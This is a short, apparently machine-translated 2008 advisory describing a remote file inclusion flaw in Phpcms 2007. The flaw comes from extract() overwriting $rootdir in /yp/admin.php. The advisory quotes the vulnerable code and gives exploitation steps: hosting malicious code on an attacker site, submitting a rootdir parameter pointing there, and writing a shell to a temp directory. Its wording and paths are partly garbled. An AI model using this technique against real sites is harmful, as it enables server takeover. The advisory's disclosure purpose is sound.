Phpcms 2 0 0 7 remote file inclusion vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62200820094
Type myhack58
Reporter 佚名
Modified 2008-08-20T00:00:00


PS:@extract function.

Phpcms 2 0 0 7 remote file include vulnerability

Flyh4t [w. s. t] The cms is the core configuration file/include/common. inc. php has a defect -------------------------------------------- //2 3 row start @extract($_POST, EXTR_OVERWRITE); @extract($_GET, EXTR_OVERWRITE); unset($_POST, $_GET); ------------------------------------------------ Here the extract function will lead to variable coverage, may lead to a series of questions

我们 看 /yp/admin.php this file name is quite scary, also with admin. But the registration a business user can access to the page, we see part of the code ------------------------------------------------ //Start from the beginning to see $rootdir = str_replace("\\", '/', dirname(FILE)); require $rootdir.'/ include/';//by extract can cover$rootdir for any value require PHPCMS_ROOT.'/ languages/'.$ CONFIG['adminlanguage'].'/ yp_admin.lang.php'; if(!$ _username) showmessage($LANG['please_login'],$PHPCMS['siteurl'].'member/login. php? forward='.$ PHP_URL); require $rootdir.'/ web/admin/include/ ';//trigger remote file contains ------------------------------------------------

The way of use can be the first in your web site. com is placed on/web/admin/include/common. inc. php such directory and the file, of Course, common. inc. php is your malicious code, and then register a user access to the site and submit Rootdir=http://site. com/can be.

Finally, multi-way, php5 by default does not open a remote file function, if you want to include a local file to the gpc limit, so it seems like this vulnerability is quite tasteless. However qiuren school provides a good method, it can be next to the note a shell write/web/admin/include/common. inc. php to the/temp directory then contains

from:http://www. wolvez. org/forum/redirect. php? tid=1 8 2&goto=lastpost